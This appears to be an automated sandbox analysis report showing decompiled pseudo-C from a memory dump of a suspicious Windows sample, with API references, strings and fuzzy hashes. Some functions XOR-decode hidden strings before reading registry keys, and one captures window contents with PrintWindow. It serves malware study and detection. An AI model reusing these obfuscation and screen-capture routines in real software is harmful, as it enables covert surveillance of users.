0x00e8a448
0x00e8a454
0x00e8a454
0x00e8a460
0x00e8a460
0x00e8a473

APIs

RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,76D681D0), ref: 00E8A37A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00E8A3D2
wsprintfA.USER32 ref: 00E8A448
CharUpperBuffA.USER32(?,00000017), ref: 00E8A454
RegCloseKey.ADVAPI32(?), ref: 00E8A460

Strings

a6c4, xrefs: 00E8A428
= ., xrefs: 00E8A3BC
!+, xrefs: 00E8A3AC
F8A/, xrefs: 00E8A31C
m*, xrefs: 00E8A432

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharCloseOpenQueryUpperValuewsprintf
String ID: !+$= .$F8A/$a6c4$m*
API String ID: 4023059497-2691204165
Opcode ID: bf8765167af547f3dc348c39cb1f0fc7a66ab8a4e108994c0be4ac1f86bc5392
Instruction ID: 2b72773d324a447e37712d3f632bd6a5f1ad9ac5d919f76822e4f9d845b2b455
Opcode Fuzzy Hash: bf8765167af547f3dc348c39cb1f0fc7a66ab8a4e108994c0be4ac1f86bc5392
Instruction Fuzzy Hash: 93316D7094426C9EDB25DF249C81BEABBB8AF19304F0041E9E54DB2111E6705BD8CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E82B76, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 116
registryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00E82B76(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v16;
				char _v17;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v40;
				void* _v44;
				signed int _v48;
				signed int _t39;
				char* _t41;
				char _t44;
				void* _t46;
				long _t48;
				void* _t52;
				void _t53;
				void _t54;
				char* _t63;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				signed int _t70;
				void* _t79;
				void* _t80;
				signed int _t81;
				intOrPtr _t83;
				void* _t84;
				void* _t90;
				signed int _t91;

				_t39 =  *0xea9014; // 0xa413846
				_v12 = _t39 ^ _t91;
				_t83 = _a4;
				_push(0x208);
				_t41 = E00E909A2();
				asm("movaps xmm0, [0xe7dba0]");
				_t63 = _t41;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x2426373f;
				_t65 = 0;
				_v20 = 0x332735;
				do {
					_t5 = _t65 + 0x40; // 0x40
					 *(_t91 + _t65 - 0x24) =  *(_t91 + _t65 - 0x24) ^ _t5;
					_t65 = _t65 + 1;
				} while (_t65 < 0x17);
				_t66 =  &_v40;
				_v17 = 0;
				_t79 = _t63 - _t66;
				do {
					_t44 =  *_t66;
					 *((char*)(_t66 + _t79)) = _t44;
					_t66 = _t66 + 1;
				} while (_t44 != 0);
				_v48 = _v48 & 0x00000000;
				_t46 = GetCurrentProcess();
				__imp__IsWow64Process(_t46,  &_v48);
				if(_t46 == 0 || _v48 == 0) {
					_t48 = RegOpenKeyA(0x80000001, _t63,  &_v44);
				} else {
					_t48 = RegOpenKeyExA(0x80000001, _t63, 0, 0x101,  &_v44);
				}
				if(_t48 == 0) {
					asm("movaps xmm0, [0xe7ddd0]");
					_t67 = 0;
					asm("movups [ebp-0x24], xmm0");
					_v24 = 0x733e3d31;
					_v20 = 0x3f223404;
					_v16 = 0;
					do {
						_t22 = _t67 + 0x40; // 0x40
						 *(_t91 + _t67 - 0x24) =  *(_t91 + _t67 - 0x24) ^ _t22;
						_t67 = _t67 + 1;
					} while (_t67 < 0x18);
					_push(_t67);
					_v16 = 0;
					E00E82CCF(_t67, _v44,  &_v40, _t83);
					_v28 = 0x2d37202c;
					_v24 = 0x35232d27;
					_v20 = 0x2e322c66;
					_v16 = 0;
					_t52 = E00E82810( &_v28);
					_t80 = _t52;
					_t90 = _t52;
					do {
						_t53 =  *_t80;
						_t80 = _t80 + 1;
					} while (_t53 != 0);
					_t81 = _t80 - _t90;
					_t84 = _t83 - 1;
					do {
						_t54 =  *(_t84 + 1);
						_t84 = _t84 + 1;
					} while (_t54 != 0);
					_t70 = _t81 >> 2;
					memcpy(_t84, _t90, _t70 << 2);
					memcpy(_t90 + _t70 + _t70, _t90, _t81 & 0x00000003);
					RegCloseKey(_v44);
					E00E90985(_t63);
				} else {
				}
				return E00E8AE43(_v12 ^ _t91);
			}

0x00e82b7c
0x00e82b83
0x00e82b89
0x00e82b8c
0x00e82b91
0x00e82b96
0x00e82b9d
0x00e82ba0
0x00e82ba4
0x00e82bab
0x00e82bad
0x00e82bb4
0x00e82bb4
0x00e82bb7
0x00e82bbb
0x00e82bbc
0x00e82bc1
0x00e82bc4
0x00e82bcc
0x00e82bce
0x00e82bce
0x00e82bd0
0x00e82bd3
0x00e82bd4
0x00e82bd8
0x00e82be0
0x00e82be7
0x00e82bef
0x00e82c1a
0x00e82bf7
0x00e82c08
0x00e82c08
0x00e82c22
0x00e82c2b
0x00e82c32
0x00e82c34
0x00e82c38
0x00e82c3f
0x00e82c46
0x00e82c4a
0x00e82c4a
0x00e82c4d
0x00e82c51
0x00e82c52
0x00e82c57
0x00e82c5c
0x00e82c64
0x00e82c6c
0x00e82c73
0x00e82c7a
0x00e82c81
0x00e82c85
0x00e82c8a
0x00e82c8c
0x00e82c8e
0x00e82c8e
0x00e82c90
0x00e82c91
0x00e82c95
0x00e82c97
0x00e82c98
0x00e82c98
0x00e82c9b
0x00e82c9c
0x00e82ca5
0x00e82ca8
0x00e82caf
0x00e82cb1
0x00e82cb8
0x00e82c24
0x00e82c24
0x00e82ccc

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 00E82BE0
IsWow64Process.KERNEL32(00000000), ref: 00E82BE7
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00E82C08
RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 00E82C1A
RegCloseKey.ADVAPI32(?,?,?,?,00000001), ref: 00E82CB1

Strings

'-#5, xrefs: 00E82C73
, 7-, xrefs: 00E82C6C
F8A/, xrefs: 00E82B7C
f,2., xrefs: 00E82C7A

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64
String ID: '-#5$, 7-$F8A/$f,2.
API String ID: 3785737565-232277209
Opcode ID: dd1531432e3c34c2abe9c44b52bc94bd57e718074f7e2c8e41dc0f2ac95a421d
Instruction ID: 11aeda507c9ec7ecbcd8711ee7382cd4c0f3589ab9664ed1a838c7816a7abcbe
Opcode Fuzzy Hash: dd1531432e3c34c2abe9c44b52bc94bd57e718074f7e2c8e41dc0f2ac95a421d
Instruction Fuzzy Hash: 3241FC709042489EEB05EFB98C447FEBBF8EF59304F50516CE689B6242DB315A89CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00E842A8, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E842A8(void* __ebx, struct HWND__* __ecx, struct HDC__* __edx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4) {
				signed int _v4;
				struct tagRECT _v20;
				void* _v24;
				intOrPtr _v44;
				signed int _v48;
				int _v52;
				int _v56;
				struct HDC__* _v60;
				signed int _t17;
				void* _t28;
				struct HWND__* _t45;
				struct HDC__* _t47;
				void* _t48;
				struct HDC__* _t50;

				_t51 =  &_v24;
				_t17 =  *0xea9014; // 0xa413846
				_v4 = _t17 ^  &_v24;
				_v24 = _a4;
				_t45 = __ecx;
				_t47 = __edx;
				GetWindowRect(__ecx,  &_v20);
				_t50 = CreateCompatibleDC(_t47);
				_t48 = CreateCompatibleBitmap(_t47, _v20.top - _v24, _v20.right - _v20.left);
				_t28 = SelectObject(_t50, _t48);
				__imp__PrintWindow(_t45, _t50, 0);
				if(_t28 != 0) {
					BitBlt(_v60, _v56, _v52, _v48 - _v56, _v44 - _v52, _t50, 0, 0, 0xcc0020);
				}
				DeleteObject(_t48);
				DeleteDC(_t50);
				return E00E8AE43(_v48 ^ _t51);
			}

0x00e842a8
0x00e842ab
0x00e842b2
0x00e842be
0x00e842c2
0x00e842c8
0x00e842ce
0x00e842db
0x00e842f6
0x00e842fa
0x00e84303
0x00e8430b
0x00e84333
0x00e84339
0x00e8433b
0x00e84342
0x00e8435c

APIs

GetWindowRect.USER32 ref: 00E842CE
CreateCompatibleDC.GDI32 ref: 00E842D5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00E842F0
SelectObject.GDI32(00000000,00000000), ref: 00E842FA
PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00E843B5,?), ref: 00E84303
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00E84333
DeleteObject.GDI32(00000000), ref: 00E8433B
DeleteDC.GDI32(00000000), ref: 00E84342

Strings

F8A/, xrefs: 00E842AB

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreateDeleteObjectWindow$BitmapPrintRectSelect
String ID: F8A/
API String ID: 2993826089-73971870
Opcode ID: 24110569a1e4c279ed633fe01cbcad765eb4b8612bb208f3dc8f4c412846f3b7
Instruction ID: a13f92d6c197a6315526265eb234b0e2be1904f729fe8a9d566ebee754267a3b
Opcode Fuzzy Hash: 24110569a1e4c279ed633fe01cbcad765eb4b8612bb208f3dc8f4c412846f3b7
Instruction Fuzzy Hash: 79111F72109205AF9340EF69DD88D6FBBECFF8E254F40091DF589E2121C724ED098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E981F3, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00E981F3(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0xe74c38;
				if(_t67 != 0xe74c38) {
					E00E964B8(_t67);
					_t36 = _a4;
				}
				E00E964B8( *((intOrPtr*)(_t36 + 0x3c)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x30)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x34)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x38)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x28)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x2c)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x40)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x44)));
				E00E964B8( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00E9803B(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00E9809C(_t71, _t75);
			}

0x00e981f3
0x00e981f8
0x00e981fe
0x00e98200
0x00e98206
0x00e98209
0x00e9820e
0x00e98211
0x00e98215
0x00e98220
0x00e9822b
0x00e98236
0x00e98241
0x00e9824c
0x00e98257
0x00e98262
0x00e98270
0x00e9827b
0x00e98283
0x00e98284
0x00e98287
0x00e9828d
0x00e98291
0x00e98295
0x00e98296
0x00e982a0
0x00e982a6
0x00e982a7
0x00e982aa
0x00e982b0
0x00e982b4
0x00e982b8
0x00e982c1

APIs

_free.LIBCMT ref: 00E98209

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

_free.LIBCMT ref: 00E98215
_free.LIBCMT ref: 00E98220
_free.LIBCMT ref: 00E9822B
_free.LIBCMT ref: 00E98236
_free.LIBCMT ref: 00E98241
_free.LIBCMT ref: 00E9824C
_free.LIBCMT ref: 00E98257
_free.LIBCMT ref: 00E98262
_free.LIBCMT ref: 00E98270

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e330d186197e405edff5792ff0a611aa3cea12328df730f2800f269963c38e19
Instruction ID: 48d8c3f35236ebda8528bfae2fcc67bfe526f343516a89c102080ef6a23a48a6
Opcode Fuzzy Hash: e330d186197e405edff5792ff0a611aa3cea12328df730f2800f269963c38e19
Instruction Fuzzy Hash: BF218776900108AFCF41EFA4C881DDE7BB9BF09340B8155A6B519EB221DB35DA548B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3CF6, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 148COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00EA0306), ref: 00EA3D0F

Strings

pow, xrefs: 00EA3DAD, 00EA3E57, 00EA3EA4
exp, xrefs: 00EA3D8E, 00EA3DF3
log10, xrefs: 00EA3D51, 00EA3D60
acos, xrefs: 00EA3E45
log, xrefs: 00EA3D6C, 00EA3D7B
sqrt, xrefs: 00EA3E4E
asin, xrefs: 00EA3E3C

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: a375efcb3aa17c4168cabc9e486bb61bfe3ea5bf165d466bbda6907ad5225c10
Instruction ID: f7925024a3d1de01a33c18defcaf835f038d69fa0601cd6d058f44b6388f2a29
Opcode Fuzzy Hash: a375efcb3aa17c4168cabc9e486bb61bfe3ea5bf165d466bbda6907ad5225c10
Instruction Fuzzy Hash: 2C517D7090460ADBCF208F79D9491EDBFB0FB8E308F10A185F895BB254C775AA24DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E8CAC0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00E8CAC0(void* __ebx, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v40;
				char _t58;
				signed int _t65;
				intOrPtr _t66;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr _t82;
				intOrPtr _t84;
				signed int _t88;
				char _t90;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t99;
				void* _t106;
				intOrPtr _t109;
				intOrPtr* _t111;
				intOrPtr _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;
				void* _t130;

				_t82 = _a8;
				_v5 = 0;
				_t114 = _t82 + 0x10;
				_push(_t114);
				_v16 = 1;
				_v20 = _t114;
				_v12 =  *(_t82 + 8) ^  *0xea9014;
				E00E8CA80( *(_t82 + 8) ^  *0xea9014);
				E00E8F487(_a12);
				_t58 = _a4;
				_t122 = _t121 + 0xc;
				_t109 =  *((intOrPtr*)(_t82 + 0xc));
				if(( *(_t58 + 4) & 0x00000066) != 0) {
					__eflags = _t109 - 0xfffffffe;
					if(_t109 != 0xfffffffe) {
						E00E8F470(_t82, 0xfffffffe, _t114, "F8A/");
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t58;
					_v28 = _a12;
					 *((intOrPtr*)(_t82 - 4)) =  &_v32;
					if(_t109 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t88 = _v12;
							_t20 = _t109 + 2; // 0x3
							_t65 = _t109 + _t20 * 2;
							_t84 =  *((intOrPtr*)(_t88 + _t65 * 4));
							_t66 = _t88 + _t65 * 4;
							_t89 =  *((intOrPtr*)(_t66 + 4));
							_v24 = _t66;
							if( *((intOrPtr*)(_t66 + 4)) == 0) {
								_t90 = _v5;
								goto L8;
							} else {
								_t67 = E00E8F420(_t89, _t114);
								_t90 = 1;
								_v5 = 1;
								_t130 = _t67;
								if(_t130 < 0) {
									_v16 = 0;
									L14:
									_push(_t114);
									E00E8CA80(_v12);
									goto L15;
								} else {
									if(_t130 > 0) {
										_t68 = _a4;
										__eflags =  *_t68 - 0xe06d7363;
										if( *_t68 == 0xe06d7363) {
											__eflags =  *0xe74370;
											if(__eflags != 0) {
												_t78 = E00EA4D30(__eflags, "x��");
												_t122 = _t122 + 4;
												__eflags = _t78;
												if(_t78 != 0) {
													_t118 =  *0xe74370; // 0xe8e178
													 *0xea72b4(_a4, 1);
													 *_t118();
													_t114 = _v20;
													_t122 = _t122 + 8;
												}
												_t68 = _a4;
											}
										}
										E00E8F454(_t68, _a8, _t68);
										_t70 = _a8;
										__eflags =  *((intOrPtr*)(_t70 + 0xc)) - _t109;
										if( *((intOrPtr*)(_t70 + 0xc)) != _t109) {
											E00E8F470(_t70, _t109, _t114, "F8A/");
											_t70 = _a8;
										}
										_push(_t114);
										 *((intOrPtr*)(_t70 + 0xc)) = _t84;
										E00E8CA80(_v12);
										E00E8F438();
										asm("int3");
										_push(_t109);
										_t111 = _v40;
										__eflags =  *((char*)(_t111 + 4));
										if( *((char*)(_t111 + 4)) == 0) {
											L31:
											_t94 = _a4;
											_t72 =  *_t111;
											 *_t94 = _t72;
											 *((char*)(_t94 + 4)) = 0;
										} else {
											_t95 =  *_t111;
											__eflags = _t95;
											if(_t95 == 0) {
												goto L31;
											} else {
												_t106 = _t95 + 1;
												do {
													_t73 =  *_t95;
													_t95 = _t95 + 1;
													__eflags = _t73;
												} while (_t73 != 0);
												_push(_t84);
												_push(_t114);
												_t85 = _t95 - _t106 + 1;
												_push(_t95 - _t106 + 1);
												_t116 = E00E909A2();
												__eflags = _t116;
												if(_t116 != 0) {
													E00E96383(_t116, _t85,  *_t111);
													_t76 = _a4;
													_t99 = _t116;
													_t116 = 0;
													__eflags = 0;
													 *_t76 = _t99;
													 *((char*)(_t76 + 4)) = 1;
												}
												_t72 = E00E90985(_t116);
											}
										}
										return _t72;
									} else {
										goto L8;
									}
								}
							}
							goto L33;
							L8:
							_t109 = _t84;
						} while (_t84 != 0xfffffffe);
						if(_t90 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L33:
			}

0x00e8cac7
0x00e8cacc
0x00e8cad3
0x00e8cadc
0x00e8cade
0x00e8cae5
0x00e8cae8
0x00e8caeb
0x00e8caf3
0x00e8caf8
0x00e8cafb
0x00e8cafe
0x00e8cb05
0x00e8cb66
0x00e8cb69
0x00e8cb78
0x00000000
0x00e8cb78
0x00000000
0x00e8cb07
0x00e8cb07
0x00e8cb0d
0x00e8cb13
0x00e8cb19
0x00e8cb89
0x00e8cb92
0x00e8cb1b
0x00e8cb20
0x00e8cb20
0x00e8cb23
0x00e8cb26
0x00e8cb29
0x00e8cb2c
0x00e8cb2f
0x00e8cb32
0x00e8cb37
0x00e8cb4d
0x00000000
0x00e8cb39
0x00e8cb3b
0x00e8cb40
0x00e8cb42
0x00e8cb45
0x00e8cb47
0x00e8cb5d
0x00e8cb7d
0x00e8cb7d
0x00e8cb81
0x00000000
0x00e8cb49
0x00e8cb49
0x00e8cb93
0x00e8cb96
0x00e8cb9c
0x00e8cb9e
0x00e8cba5
0x00e8cbac
0x00e8cbb1
0x00e8cbb4
0x00e8cbb6
0x00e8cbb8
0x00e8cbc5
0x00e8cbcb
0x00e8cbcd
0x00e8cbd0
0x00e8cbd0
0x00e8cbd3
0x00e8cbd3
0x00e8cba5
0x00e8cbdb
0x00e8cbe0
0x00e8cbe3
0x00e8cbe6
0x00e8cbf2
0x00e8cbf7
0x00e8cbf7
0x00e8cbfa
0x00e8cbfe
0x00e8cc01
0x00e8cc11
0x00e8cc16
0x00e8cc1a
0x00e8cc1b
0x00e8cc1e
0x00e8cc22
0x00e8cc6c
0x00e8cc6c
0x00e8cc6f
0x00e8cc71
0x00e8cc73
0x00e8cc24
0x00e8cc24
0x00e8cc26
0x00e8cc28
0x00000000
0x00e8cc2a
0x00e8cc2a
0x00e8cc2d
0x00e8cc2d
0x00e8cc2f
0x00e8cc30
0x00e8cc30
0x00e8cc36
0x00e8cc37
0x00e8cc38
0x00e8cc3b
0x00e8cc41
0x00e8cc44
0x00e8cc46
0x00e8cc4c
0x00e8cc51
0x00e8cc54
0x00e8cc59
0x00e8cc59
0x00e8cc5b
0x00e8cc5d
0x00e8cc5d
0x00e8cc62
0x00e8cc69
0x00e8cc28
0x00e8cc79
0x00e8cb4b
0x00000000
0x00e8cb4b
0x00e8cb49
0x00e8cb47
0x00000000
0x00e8cb50
0x00e8cb50
0x00e8cb52
0x00e8cb59
0x00000000
0x00e8cb5b
0x00000000
0x00e8cb59
0x00e8cb19
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00E8CAEB
___except_validate_context_record.LIBVCRUNTIME ref: 00E8CAF3
_ValidateLocalCookies.LIBCMT ref: 00E8CB81
__IsNonwritableInCurrentImage.LIBCMT ref: 00E8CBAC
_ValidateLocalCookies.LIBCMT ref: 00E8CC01

Strings

csm, xrefs: 00E8CB96
F8A/, xrefs: 00E8CB6B, 00E8CBE8
x, xrefs: 00E8CB9E, 00E8CBA7, 00E8CBB8

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: F8A/$csm$x
API String ID: 1170836740-25650968
Opcode ID: 7eaeb42f0e786af39810d9dc9ff101e9de468db96b95b306604c081a2060cb9e
Instruction ID: bdbbef78af2400f3901554c5a53e03c778b0eea20bafa30c605240f7307369b9
Opcode Fuzzy Hash: 7eaeb42f0e786af39810d9dc9ff101e9de468db96b95b306604c081a2060cb9e
Instruction Fuzzy Hash: A441A834E006099BCF10EF68D885A9EBBF5EF46318F249565E81D7B392D7319E05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E97A53, Relevance: 13.8, APIs: 9, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00E97A53(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				signed char _t148;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed char _t196;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(_t198 < 0) {
						L59:
						_t137 = E00E95BAA();
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00E95BBD())) = 9;
						L60:
						_t139 = E00E928EC();
						goto L61;
					}
					__eflags = _t198 -  *0xeaa8c8; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0xeaa6c8 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if((1 & _t224) == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(_t210 <= 0x7fffffff) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							_t148 =  !_t210;
							__eflags = _t148 & 0x00000001;
							if((_t148 & 0x00000001) == 0) {
								L14:
								 *(E00E95BAA()) =  *_t149 & _t240;
								 *((intOrPtr*)(E00E95BBD())) = 0x16;
								E00E928EC();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00E96F1C(_t154);
								E00E964B8(0);
								E00E964B8(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(_t240 != 0) {
									_t158 = E00E972D3(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0xeaa6c8 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0xeaa6c8 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0xeaa6c8 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xeaa6c8 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0xeaa6c8 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xeaa6c8 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
